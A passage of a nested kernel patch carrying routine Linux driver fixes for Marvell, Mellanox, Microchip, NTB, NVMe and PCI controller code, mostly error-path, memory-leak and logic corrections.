++++ b/drivers/net/ethernet/marvell/mvneta.c
+@@ -1505,7 +1505,7 @@ static void mvneta_defaults_set(struct mvneta_port *pp)
+ 			 */
+ 			if (txq_number == 1)
+ 				txq_map = (cpu == pp->rxq_def) ?
+-					MVNETA_CPU_TXQ_ACCESS(1) : 0;
++					MVNETA_CPU_TXQ_ACCESS(0) : 0;
+ 
+ 		} else {
+ 			txq_map = MVNETA_CPU_TXQ_ACCESS_ALL_MASK;
+@@ -4294,7 +4294,7 @@ static void mvneta_percpu_elect(struct mvneta_port *pp)
+ 		 */
+ 		if (txq_number == 1)
+ 			txq_map = (cpu == elected_cpu) ?
+-				MVNETA_CPU_TXQ_ACCESS(1) : 0;
++				MVNETA_CPU_TXQ_ACCESS(0) : 0;
+ 		else
+ 			txq_map = mvreg_read(pp, MVNETA_CPU_MAP(cpu)) &
+ 				MVNETA_CPU_TXQ_ACCESS_ALL_MASK;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/ptp.c b/drivers/net/ethernet/marvell/octeontx2/af/ptp.c
+index 3411e2e47d46b..0ee420a489fc4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/ptp.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/ptp.c
+@@ -208,7 +208,7 @@ struct ptp *ptp_get(void)
+ 	/* Check driver is bound to PTP block */
+ 	if (!ptp)
+ 		ptp = ERR_PTR(-EPROBE_DEFER);
+-	else
++	else if (!IS_ERR(ptp))
+ 		pci_dev_get(ptp->pdev);
+ 
+ 	return ptp;
+@@ -388,11 +388,10 @@ static int ptp_extts_on(struct ptp *ptp, int on)
+ static int ptp_probe(struct pci_dev *pdev,
+ 		     const struct pci_device_id *ent)
+ {
+-	struct device *dev = &pdev->dev;
+ 	struct ptp *ptp;
+ 	int err;
+ 
+-	ptp = devm_kzalloc(dev, sizeof(*ptp), GFP_KERNEL);
++	ptp = kzalloc(sizeof(*ptp), GFP_KERNEL);
+ 	if (!ptp) {
+ 		err = -ENOMEM;
+ 		goto error;
+@@ -428,20 +427,19 @@ static int ptp_probe(struct pci_dev *pdev,
+ 	return 0;
+ 
+ error_free:
+-	devm_kfree(dev, ptp);
++	kfree(ptp);
+ 
+ error:
+ 	/* For `ptp_get()` we need to differentiate between the case
+ 	 * when the core has not tried to probe this device and the case when
+-	 * the probe failed.  In the later case we pretend that the
+-	 * initialization was successful and keep the error in
++	 * the probe failed.  In the later case we keep the error in
+ 	 * `dev->driver_data`.
+ 	 */
+ 	pci_set_drvdata(pdev, ERR_PTR(err));
+ 	if (!first_ptp_block)
+ 		first_ptp_block = ERR_PTR(err);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ static void ptp_remove(struct pci_dev *pdev)
+@@ -449,16 +447,17 @@ static void ptp_remove(struct pci_dev *pdev)
+ 	struct ptp *ptp = pci_get_drvdata(pdev);
+ 	u64 clock_cfg;
+ 
+-	if (cn10k_ptp_errata(ptp) && hrtimer_active(&ptp->hrtimer))
+-		hrtimer_cancel(&ptp->hrtimer);
+-
+ 	if (IS_ERR_OR_NULL(ptp))
+ 		return;
+ 
++	if (cn10k_ptp_errata(ptp) && hrtimer_active(&ptp->hrtimer))
++		hrtimer_cancel(&ptp->hrtimer);
++
+ 	/* Disable PTP clock */
+ 	clock_cfg = readq(ptp->reg_base + PTP_CLOCK_CFG);
+ 	clock_cfg &= ~PTP_CLOCK_CFG_PTP_EN;
+ 	writeq(clock_cfg, ptp->reg_base + PTP_CLOCK_CFG);
++	kfree(ptp);
+ }
+ 
+ static const struct pci_device_id ptp_id_table[] = {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 873f081c030de..733add3a9dc6b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -3244,7 +3244,7 @@ static int rvu_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	rvu->ptp = ptp_get();
+ 	if (IS_ERR(rvu->ptp)) {
+ 		err = PTR_ERR(rvu->ptp);
+-		if (err == -EPROBE_DEFER)
++		if (err)
+ 			goto err_release_regions;
+ 		rvu->ptp = NULL;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 8cb2a0181fb9b..705325431dec3 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -3804,21 +3804,14 @@ int rvu_mbox_handler_nix_set_rx_mode(struct rvu *rvu, struct nix_rx_mode *req,
+ 	}
+ 
+ 	/* install/uninstall promisc entry */
+-	if (promisc) {
++	if (promisc)
+ 		rvu_npc_install_promisc_entry(rvu, pcifunc, nixlf,
+ 					      pfvf->rx_chan_base,
+ 					      pfvf->rx_chan_cnt);
+-
+-		if (rvu_npc_exact_has_match_table(rvu))
+-			rvu_npc_exact_promisc_enable(rvu, pcifunc);
+-	} else {
++	else
+ 		if (!nix_rx_multicast)
+ 			rvu_npc_enable_promisc_entry(rvu, pcifunc, nixlf, false);
+ 
+-		if (rvu_npc_exact_has_match_table(rvu))
+-			rvu_npc_exact_promisc_disable(rvu, pcifunc);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 3b48b635977f6..3b0a66c0977a7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -1168,8 +1168,10 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ {
+ 	struct npc_exact_table *table;
+ 	u16 *cnt, old_cnt;
++	bool promisc;
+ 
+ 	table = rvu->hw->table;
++	promisc = table->promisc_mode[drop_mcam_idx];
+ 
+ 	cnt = &table->cnt_cmd_rules[drop_mcam_idx];
+ 	old_cnt = *cnt;
+@@ -1181,13 +1183,18 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ 
+ 	*enable_or_disable_cam = false;
+ 
+-	/* If all rules are deleted, disable cam */
++	if (promisc)
++		goto done;
++
++	/* If all rules are deleted and not already in promisc mode;
++	 * disable cam
++	 */
+ 	if (!*cnt && val < 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+ 	}
+ 
+-	/* If rule got added, enable cam */
++	/* If rule got added and not already in promisc mode; enable cam */
+ 	if (!old_cnt && val > 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+@@ -1466,6 +1473,12 @@ int rvu_npc_exact_promisc_disable(struct rvu *rvu, u16 pcifunc)
+ 	*promisc = false;
+ 	mutex_unlock(&table->lock);
+ 
++	/* Enable drop rule */
++	rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX,
++					   true);
++
++	dev_dbg(rvu->dev, "%s: disabled  promisc mode (cgx=%d lmac=%d)\n",
++		__func__, cgx_id, lmac_id);
+ 	return 0;
+ }
+ 
+@@ -1507,6 +1520,12 @@ int rvu_npc_exact_promisc_enable(struct rvu *rvu, u16 pcifunc)
+ 	*promisc = true;
+ 	mutex_unlock(&table->lock);
+ 
++	/*  disable drop rule */
++	rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX,
++					   false);
++
++	dev_dbg(rvu->dev, "%s: Enabled promisc mode (cgx=%d lmac=%d)\n",
++		__func__, cgx_id, lmac_id);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index d0554f6d26731..934c199667b59 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -867,6 +867,14 @@ static int otx2_prepare_flow_request(struct ethtool_rx_flow_spec *fsp,
+ 				return -EINVAL;
+ 
+ 			vlan_etype = be16_to_cpu(fsp->h_ext.vlan_etype);
++
++			/* Drop rule with vlan_etype == 802.1Q
++			 * and vlan_id == 0 is not supported
++			 */
++			if (vlan_etype == ETH_P_8021Q && !fsp->m_ext.vlan_tci &&
++			    fsp->ring_cookie == RX_CLS_FLOW_DISC)
++				return -EINVAL;
++
+ 			/* Only ETH_P_8021Q and ETH_P_802AD types supported */
+ 			if (vlan_etype != ETH_P_8021Q &&
+ 			    vlan_etype != ETH_P_8021AD)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+index 6a01ab1a6e6f3..1aeb18a901b13 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+@@ -579,6 +579,21 @@ static int otx2_tc_prepare_flow(struct otx2_nic *nic, struct otx2_tc_flow *node,
+ 			return -EOPNOTSUPP;
+ 		}
+ 
++		if (!match.mask->vlan_id) {
++			struct flow_action_entry *act;
++			int i;
++
++			flow_action_for_each(i, act, &rule->action) {
++				if (act->id == FLOW_ACTION_DROP) {
++					netdev_err(nic->netdev,
++						   "vlan tpid 0x%x with vlan_id %d is not supported for DROP rule.\n",
++						   ntohs(match.key->vlan_tpid),
++						   match.key->vlan_id);
++					return -EOPNOTSUPP;
++				}
++			}
++		}
++
+ 		if (match.mask->vlan_id ||
+ 		    match.mask->vlan_dei ||
+ 		    match.mask->vlan_priority) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+index 03cb79adf912f..be83ad9db82a4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+@@ -594,7 +594,7 @@ int mlx5e_fs_tt_redirect_any_create(struct mlx5e_flow_steering *fs)
+ 
+ 	err = fs_any_create_table(fs);
+ 	if (err)
+-		return err;
++		goto err_free_any;
+ 
+ 	err = fs_any_enable(fs);
+ 	if (err)
+@@ -606,8 +606,8 @@ int mlx5e_fs_tt_redirect_any_create(struct mlx5e_flow_steering *fs)
+ 
+ err_destroy_table:
+ 	fs_any_destroy_table(fs_any);
+-
+-	kfree(fs_any);
++err_free_any:
+ 	mlx5e_fs_set_any(fs, NULL);
++	kfree(fs_any);
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index efd02ce4425de..72b4781f0eb2f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -729,8 +729,10 @@ int mlx5e_ptp_open(struct mlx5e_priv *priv, struct mlx5e_params *params,
+ 
+ 	c = kvzalloc_node(sizeof(*c), GFP_KERNEL, dev_to_node(mlx5_core_dma_dev(mdev)));
+ 	cparams = kvzalloc(sizeof(*cparams), GFP_KERNEL);
+-	if (!c || !cparams)
+-		return -ENOMEM;
++	if (!c || !cparams) {
++		err = -ENOMEM;
++		goto err_free;
++	}
+ 
+ 	c->priv     = priv;
+ 	c->mdev     = priv->mdev;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c
+index d7c020f724013..06c47404996bb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c
+@@ -190,6 +190,7 @@ static int accel_fs_tcp_create_groups(struct mlx5e_flow_table *ft,
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if  (!in || !ft->g) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		kvfree(in);
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 7883b625634fb..7ab489520a873 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -1551,7 +1551,8 @@ static void remove_unready_flow(struct mlx5e_tc_flow *flow)
+ 	uplink_priv = &rpriv->uplink_priv;
+ 
+ 	mutex_lock(&uplink_priv->unready_flows_lock);
+-	unready_flow_del(flow);
++	if (flow_flag_test(flow, NOT_READY))
++		unready_flow_del(flow);
+ 	mutex_unlock(&uplink_priv->unready_flows_lock);
+ }
+ 
+@@ -1896,8 +1897,7 @@ static void mlx5e_tc_del_fdb_flow(struct mlx5e_priv *priv,
+ 	esw_attr = attr->esw_attr;
+ 	mlx5e_put_flow_tunnel_id(flow);
+ 
+-	if (flow_flag_test(flow, NOT_READY))
+-		remove_unready_flow(flow);
++	remove_unready_flow(flow);
+ 
+ 	if (mlx5e_is_offloaded_flow(flow)) {
+ 		if (flow_flag_test(flow, SLOW))
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.c b/drivers/net/ethernet/microchip/lan743x_main.c
+index 50eeecba1f18d..e804613faa1fc 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.c
++++ b/drivers/net/ethernet/microchip/lan743x_main.c
+@@ -144,6 +144,18 @@ static int lan743x_csr_light_reset(struct lan743x_adapter *adapter)
+ 				  !(data & HW_CFG_LRST_), 100000, 10000000);
+ }
+ 
++static int lan743x_csr_wait_for_bit_atomic(struct lan743x_adapter *adapter,
++					   int offset, u32 bit_mask,
++					   int target_value, int udelay_min,
++					   int udelay_max, int count)
++{
++	u32 data;
++
++	return readx_poll_timeout_atomic(LAN743X_CSR_READ_OP, offset, data,
++					 target_value == !!(data & bit_mask),
++					 udelay_max, udelay_min * count);
++}
++
+ static int lan743x_csr_wait_for_bit(struct lan743x_adapter *adapter,
+ 				    int offset, u32 bit_mask,
+ 				    int target_value, int usleep_min,
+@@ -746,8 +758,8 @@ static int lan743x_dp_write(struct lan743x_adapter *adapter,
+ 	u32 dp_sel;
+ 	int i;
+ 
+-	if (lan743x_csr_wait_for_bit(adapter, DP_SEL, DP_SEL_DPRDY_,
+-				     1, 40, 100, 100))
++	if (lan743x_csr_wait_for_bit_atomic(adapter, DP_SEL, DP_SEL_DPRDY_,
++					    1, 40, 100, 100))
+ 		return -EIO;
+ 	dp_sel = lan743x_csr_read(adapter, DP_SEL);
+ 	dp_sel &= ~DP_SEL_MASK_;
+@@ -758,8 +770,9 @@ static int lan743x_dp_write(struct lan743x_adapter *adapter,
+ 		lan743x_csr_write(adapter, DP_ADDR, addr + i);
+ 		lan743x_csr_write(adapter, DP_DATA_0, buf[i]);
+ 		lan743x_csr_write(adapter, DP_CMD, DP_CMD_WRITE_);
+-		if (lan743x_csr_wait_for_bit(adapter, DP_SEL, DP_SEL_DPRDY_,
+-					     1, 40, 100, 100))
++		if (lan743x_csr_wait_for_bit_atomic(adapter, DP_SEL,
++						    DP_SEL_DPRDY_,
++						    1, 40, 100, 100))
+ 			return -EIO;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index 159bfcc76498c..a89ab455af67d 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -462,11 +462,6 @@ static void ionic_qcqs_free(struct ionic_lif *lif)
+ static void ionic_link_qcq_interrupts(struct ionic_qcq *src_qcq,
+ 				      struct ionic_qcq *n_qcq)
+ {
+-	if (WARN_ON(n_qcq->flags & IONIC_QCQ_F_INTR)) {
+-		ionic_intr_free(n_qcq->cq.lif->ionic, n_qcq->intr.index);
+-		n_qcq->flags &= ~IONIC_QCQ_F_INTR;
+-	}
+-
+ 	n_qcq->intr.vector = src_qcq->intr.vector;
+ 	n_qcq->intr.index = src_qcq->intr.index;
+ 	n_qcq->napi_qcq = src_qcq->napi_qcq;
+diff --git a/drivers/net/netdevsim/dev.c b/drivers/net/netdevsim/dev.c
+index 68e56e451b2be..c3fbdd6b68baf 100644
+--- a/drivers/net/netdevsim/dev.c
++++ b/drivers/net/netdevsim/dev.c
+@@ -184,13 +184,10 @@ static ssize_t nsim_dev_trap_fa_cookie_write(struct file *file,
+ 	cookie_len = (count - 1) / 2;
+ 	if ((count - 1) % 2)
+ 		return -EINVAL;
+-	buf = kmalloc(count, GFP_KERNEL | __GFP_NOWARN);
+-	if (!buf)
+-		return -ENOMEM;
+ 
+-	ret = simple_write_to_buffer(buf, count, ppos, data, count);
+-	if (ret < 0)
+-		goto free_buf;
++	buf = memdup_user(data, count);
++	if (IS_ERR(buf))
++		return PTR_ERR(buf);
+ 
+ 	fa_cookie = kmalloc(sizeof(*fa_cookie) + cookie_len,
+ 			    GFP_KERNEL | __GFP_NOWARN);
+diff --git a/drivers/net/phy/dp83td510.c b/drivers/net/phy/dp83td510.c
+index 3cd9a77f95324..d7616b13c5946 100644
+--- a/drivers/net/phy/dp83td510.c
++++ b/drivers/net/phy/dp83td510.c
+@@ -12,6 +12,11 @@
+ 
+ /* MDIO_MMD_VEND2 registers */
+ #define DP83TD510E_PHY_STS			0x10
++/* Bit 7 - mii_interrupt, active high. Clears on read.
++ * Note: Clearing does not necessarily deactivate IRQ pin if interrupts pending.
++ * This differs from the DP83TD510E datasheet (2020) which states this bit
++ * clears on write 0.
++ */
+ #define DP83TD510E_STS_MII_INT			BIT(7)
+ #define DP83TD510E_LINK_STATUS			BIT(0)
+ 
+@@ -53,12 +58,6 @@ static int dp83td510_config_intr(struct phy_device *phydev)
+ 	int ret;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED) {
+-		/* Clear any pending interrupts */
+-		ret = phy_write_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_PHY_STS,
+-				    0x0);
+-		if (ret)
+-			return ret;
+-
+ 		ret = phy_write_mmd(phydev, MDIO_MMD_VEND2,
+ 				    DP83TD510E_INTERRUPT_REG_1,
+ 				    DP83TD510E_INT1_LINK_EN);
+@@ -81,10 +80,6 @@ static int dp83td510_config_intr(struct phy_device *phydev)
+ 					 DP83TD510E_GENCFG_INT_EN);
+ 		if (ret)
+ 			return ret;
+-
+-		/* Clear any pending interrupts */
+-		ret = phy_write_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_PHY_STS,
+-				    0x0);
+ 	}
+ 
+ 	return ret;
+@@ -94,14 +89,6 @@ static irqreturn_t dp83td510_handle_interrupt(struct phy_device *phydev)
+ {
+ 	int  ret;
+ 
+-	ret = phy_read_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_PHY_STS);
+-	if (ret < 0) {
+-		phy_error(phydev);
+-		return IRQ_NONE;
+-	} else if (!(ret & DP83TD510E_STS_MII_INT)) {
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Read the current enabled interrupts */
+ 	ret = phy_read_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_INTERRUPT_REG_1);
+ 	if (ret < 0) {
+diff --git a/drivers/net/wireless/cisco/airo.c b/drivers/net/wireless/cisco/airo.c
+index fb2c35bd73bb1..f6362429b735b 100644
+--- a/drivers/net/wireless/cisco/airo.c
++++ b/drivers/net/wireless/cisco/airo.c
+@@ -6146,8 +6146,11 @@ static int airo_get_rate(struct net_device *dev,
+ {
+ 	struct airo_info *local = dev->ml_priv;
+ 	StatusRid status_rid;		/* Card status info */
++	int ret;
+ 
+-	readStatusRid(local, &status_rid, 1);
++	ret = readStatusRid(local, &status_rid, 1);
++	if (ret)
++		return -EBUSY;
+ 
+ 	vwrq->value = le16_to_cpu(status_rid.currentXmitRate) * 500000;
+ 	/* If more than one rate, set auto */
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 50701c55ed602..ec0af903961f0 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -2130,17 +2130,18 @@ static ssize_t rtw89_debug_priv_send_h2c_set(struct file *filp,
+ 	struct rtw89_debugfs_priv *debugfs_priv = filp->private_data;
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
+ 	u8 *h2c;
++	int ret;
+ 	u16 h2c_len = count / 2;
+ 
+ 	h2c = rtw89_hex2bin_user(rtwdev, user_buf, count);
+ 	if (IS_ERR(h2c))
+ 		return -EFAULT;
+ 
+-	rtw89_fw_h2c_raw(rtwdev, h2c, h2c_len);
++	ret = rtw89_fw_h2c_raw(rtwdev, h2c, h2c_len);
+ 
+ 	kfree(h2c);
+ 
+-	return count;
++	return ret ? ret : count;
+ }
+ 
+ static int
+diff --git a/drivers/ntb/hw/amd/ntb_hw_amd.c b/drivers/ntb/hw/amd/ntb_hw_amd.c
+index 04550b1f984c6..730f2103b91d1 100644
+--- a/drivers/ntb/hw/amd/ntb_hw_amd.c
++++ b/drivers/ntb/hw/amd/ntb_hw_amd.c
+@@ -1338,12 +1338,17 @@ static struct pci_driver amd_ntb_pci_driver = {
+ 
+ static int __init amd_ntb_pci_driver_init(void)
+ {
++	int ret;
+ 	pr_info("%s %s\n", NTB_DESC, NTB_VER);
+ 
+ 	if (debugfs_initialized())
+ 		debugfs_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+-	return pci_register_driver(&amd_ntb_pci_driver);
++	ret = pci_register_driver(&amd_ntb_pci_driver);
++	if (ret)
++		debugfs_remove_recursive(debugfs_dir);
++
++	return ret;
+ }
+ module_init(amd_ntb_pci_driver_init);
+ 
+diff --git a/drivers/ntb/hw/idt/ntb_hw_idt.c b/drivers/ntb/hw/idt/ntb_hw_idt.c
+index 0ed6f809ff2ee..51799fccf8404 100644
+--- a/drivers/ntb/hw/idt/ntb_hw_idt.c
++++ b/drivers/ntb/hw/idt/ntb_hw_idt.c
+@@ -2891,6 +2891,7 @@ static struct pci_driver idt_pci_driver = {
+ 
+ static int __init idt_pci_driver_init(void)
+ {
++	int ret;
+ 	pr_info("%s %s\n", NTB_DESC, NTB_VER);
+ 
+ 	/* Create the top DebugFS directory if the FS is initialized */
+@@ -2898,7 +2899,11 @@ static int __init idt_pci_driver_init(void)
+ 		dbgfs_topdir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+ 	/* Register the NTB hardware driver to handle the PCI device */
+-	return pci_register_driver(&idt_pci_driver);
++	ret = pci_register_driver(&idt_pci_driver);
++	if (ret)
++		debugfs_remove_recursive(dbgfs_topdir);
++
++	return ret;
+ }
+ module_init(idt_pci_driver_init);
+ 
+diff --git a/drivers/ntb/hw/intel/ntb_hw_gen1.c b/drivers/ntb/hw/intel/ntb_hw_gen1.c
+index 84772013812bf..60a4ebc7bf35a 100644
+--- a/drivers/ntb/hw/intel/ntb_hw_gen1.c
++++ b/drivers/ntb/hw/intel/ntb_hw_gen1.c
+@@ -2064,12 +2064,17 @@ static struct pci_driver intel_ntb_pci_driver = {
+ 
+ static int __init intel_ntb_pci_driver_init(void)
+ {
++	int ret;
+ 	pr_info("%s %s\n", NTB_DESC, NTB_VER);
+ 
+ 	if (debugfs_initialized())
+ 		debugfs_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+-	return pci_register_driver(&intel_ntb_pci_driver);
++	ret = pci_register_driver(&intel_ntb_pci_driver);
++	if (ret)
++		debugfs_remove_recursive(debugfs_dir);
++
++	return ret;
+ }
+ module_init(intel_ntb_pci_driver_init);
+ 
+diff --git a/drivers/ntb/ntb_transport.c b/drivers/ntb/ntb_transport.c
+index a9b97ebc71ac5..2abd2235bbcab 100644
+--- a/drivers/ntb/ntb_transport.c
++++ b/drivers/ntb/ntb_transport.c
+@@ -410,7 +410,7 @@ int ntb_transport_register_client_dev(char *device_name)
+ 
+ 		rc = device_register(dev);
+ 		if (rc) {
+-			kfree(client_dev);
++			put_device(dev);
+ 			goto err;
+ 		}
+ 
+diff --git a/drivers/ntb/test/ntb_tool.c b/drivers/ntb/test/ntb_tool.c
+index 5ee0afa621a95..eeeb4b1c97d2c 100644
+--- a/drivers/ntb/test/ntb_tool.c
++++ b/drivers/ntb/test/ntb_tool.c
+@@ -998,6 +998,8 @@ static int tool_init_mws(struct tool_ctx *tc)
+ 		tc->peers[pidx].outmws =
+ 			devm_kcalloc(&tc->ntb->dev, tc->peers[pidx].outmw_cnt,
+ 				   sizeof(*tc->peers[pidx].outmws), GFP_KERNEL);
++		if (tc->peers[pidx].outmws == NULL)
++			return -ENOMEM;
+ 
+ 		for (widx = 0; widx < tc->peers[pidx].outmw_cnt; widx++) {
+ 			tc->peers[pidx].outmws[widx].pidx = pidx;
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 560ce2f05a96d..fd73db8a535d8 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4175,10 +4175,40 @@ static int nvme_init_ns_head(struct nvme_ns *ns, struct nvme_ns_info *info)
+ 
+ 	ret = nvme_global_check_duplicate_ids(ctrl->subsys, &info->ids);
+ 	if (ret) {
+-		dev_err(ctrl->device,
+-			"globally duplicate IDs for nsid %d\n", info->nsid);
++		/*
++		 * We've found two different namespaces on two different
++		 * subsystems that report the same ID.  This is pretty nasty
++		 * for anything that actually requires unique device
++		 * identification.  In the kernel we need this for multipathing,
++		 * and in user space the /dev/disk/by-id/ links rely on it.
++		 *
++		 * If the device also claims to be multi-path capable back off
++		 * here now and refuse the probe the second device as this is a
++		 * recipe for data corruption.  If not this is probably a
++		 * cheap consumer device if on the PCIe bus, so let the user
++		 * proceed and use the shiny toy, but warn that with changing
++		 * probing order (which due to our async probing could just be
++		 * device taking longer to startup) the other device could show
++		 * up at any time.
++		 */
+ 		nvme_print_device_info(ctrl);
+-		return ret;
++		if ((ns->ctrl->ops->flags & NVME_F_FABRICS) || /* !PCIe */
++		    ((ns->ctrl->subsys->cmic & NVME_CTRL_CMIC_MULTI_CTRL) &&
++		     info->is_shared)) {
++			dev_err(ctrl->device,
++				"ignoring nsid %d because of duplicate IDs\n",
++				info->nsid);
++			return ret;
++		}
++
++		dev_err(ctrl->device,
++			"clearing duplicate IDs for nsid %d\n", info->nsid);
++		dev_err(ctrl->device,
++			"use of /dev/disk/by-id/ may cause data corruption\n");
++		memset(&info->ids.nguid, 0, sizeof(info->ids.nguid));
++		memset(&info->ids.uuid, 0, sizeof(info->ids.uuid));
++		memset(&info->ids.eui64, 0, sizeof(info->ids.eui64));
++		ctrl->quirks |= NVME_QUIRK_BOGUS_NID;
+ 	}
+ 
+ 	mutex_lock(&ctrl->subsys->lock);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 145fa7ef3f740..ce2e628f94a05 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -1022,7 +1022,7 @@ static __always_inline void nvme_pci_unmap_rq(struct request *req)
+ 	        struct nvme_iod *iod = blk_mq_rq_to_pdu(req);
+ 
+ 		dma_unmap_page(dev->dev, iod->meta_dma,
+-			       rq_integrity_vec(req)->bv_len, rq_data_dir(req));
++			       rq_integrity_vec(req)->bv_len, rq_dma_dir(req));
+ 	}
+ 
+ 	if (blk_rq_nr_phys_segments(req))
+diff --git a/drivers/opp/core.c b/drivers/opp/core.c
+index e87567dbe99f2..d707214069ca9 100644
+--- a/drivers/opp/core.c
++++ b/drivers/opp/core.c
+@@ -1348,7 +1348,10 @@ static struct opp_table *_allocate_opp_table(struct device *dev, int index)
+ 	return opp_table;
+ 
+ remove_opp_dev:
++	_of_clear_opp_table(opp_table);
+ 	_remove_opp_dev(opp_dev, opp_table);
++	mutex_destroy(&opp_table->genpd_virt_dev_lock);
++	mutex_destroy(&opp_table->lock);
+ err:
+ 	kfree(opp_table);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 49905b2a99607..d24712a76ba7c 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1176,6 +1176,8 @@ static int qcom_pcie_post_init_2_3_3(struct qcom_pcie *pcie)
+ 	writel(PCI_EXP_DEVCTL2_COMP_TMOUT_DIS, pci->dbi_base + offset +
+ 		PCI_EXP_DEVCTL2);
+ 
++	dw_pcie_dbi_ro_wr_dis(pci);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pci/controller/pcie-rockchip-ep.c b/drivers/pci/controller/pcie-rockchip-ep.c
+index d1a200b93b2bf..827d91e73efab 100644
+--- a/drivers/pci/controller/pcie-rockchip-ep.c
++++ b/drivers/pci/controller/pcie-rockchip-ep.c
+@@ -125,6 +125,7 @@ static void rockchip_pcie_prog_ep_ob_atu(struct rockchip_pcie *rockchip, u8 fn,
+ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+ 					 struct pci_epf_header *hdr)
+ {
++	u32 reg;
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+ 
